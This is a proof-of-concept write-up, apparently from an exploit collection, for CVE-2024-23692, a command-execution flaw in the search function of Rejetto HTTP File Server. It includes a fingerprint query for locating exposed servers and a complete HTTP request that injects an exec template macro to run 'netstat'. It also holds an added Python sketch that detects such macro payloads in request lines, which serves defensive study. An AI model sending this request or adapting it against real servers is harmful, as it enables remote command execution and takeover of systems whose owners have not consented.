POC/wpoc/Rejetto/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


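# Rejetto HTTP File Server search command execution vulnerability (CVE-2024-23692)
# 1. Vulnerability overview
Rejetto HTTP File Server is a free, cross-platform, Java-based lightweight HTTP file server. It lets users access and manage files through a web browser and supports upload, download, delete, rename, create-directory and other operations. The search interface of Rejetto HTTP File Server has an RCE vulnerability (CVE-2024-23692): a malicious attacker may exploit it to execute malicious commands and obtain sensitive server information, which may ultimately lead to compromise of the server.
# 2. Affected versions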
+ Rejetto HTTP File Server <= 2.3m
# 3. Asset mapping
```http
app="HFS"
```
+ Fingerprint
![1718116518836-b92544c4-a811-4dee-8285-756a066df0ce.png](./img/-gVG0vk06azCeMDZ/1718116518836-b92544c4-a811-4dee-8285-756a066df0ce-300730.png)
# 4. Vulnerability reproduction
```http
GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
```
![1718116766397-856eb67d-c89a-4559-a5b4-662267245327.png](./img/-gVG0vk06azCeMDZ/1718116766397-856eb67d-c89a-4559-a5b4-662267245327-686273.png)
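
A detection sketch for the request above, added here as an example and not part of the original write-up: it flags request lines whose query parameters contain the `{.` macro marker or the `{.exec|` macro seen in that request. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Macro markers taken from the request shown above: "{." opens a template
# macro and "{.exec|" is the macro that runs a command.
MACRO_OPEN = re.compile(r"\{\.")
EXEC_MACRO = re.compile(r"\{\.\s*exec\s*\|", re.IGNORECASE)

def classify_target(target):
    """Classify a request target as 'exec-macro', 'macro' or 'clean'."""
    verdict = "clean"
    # parse_qsl percent-decodes each value, so encoded braces are matched too.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if EXEC_MACRO.search(value):
            return "exec-macro"
        if MACRO_OPEN.search(value):
            verdict = "macro"
    return verdict

def scan_request_lines(lines):
    """Yield (verdict, line) for every non-clean 'METHOD target HTTP/x' line."""
    for line in lines:
        parts = line.strip().split(" ")
        if len(parts) != 3:
            continue  # not a well-formed request line; skip it
        verdict = classify_target(parts[1])
        if verdict != "clean":
            yield verdict, line

# Constructed sample request lines (not real traffic); the third is a
# shortened form of the request on this page.
SAMPLE = [
    "GET /?search=report.pdf HTTP/1.1",
    "GET /docs/?sort=name HTTP/1.1",
    "GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.} HTTP/1.1",
    "GET /?search=%7B.exec%7C%7B.%3Fcmd.%7D.%7D HTTP/1.1",
    "GET /?search=%7B.%3Fn.%7D HTTP/1.1",
]

if __name__ == "__main__":
    for verdict, line in scan_request_lines(SAMPLE):
        print(f"[{verdict}] {line}")
```

A `macro` verdict is a lead for review; an `exec-macro` verdict against a host running an affected version warrants checking that host for compromise.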
> Updated: 2024-06-17 09:34:03
> Original: <https://www.yuque.com/xiaokp7/ocvun2/ksyz94lfputxy1uv>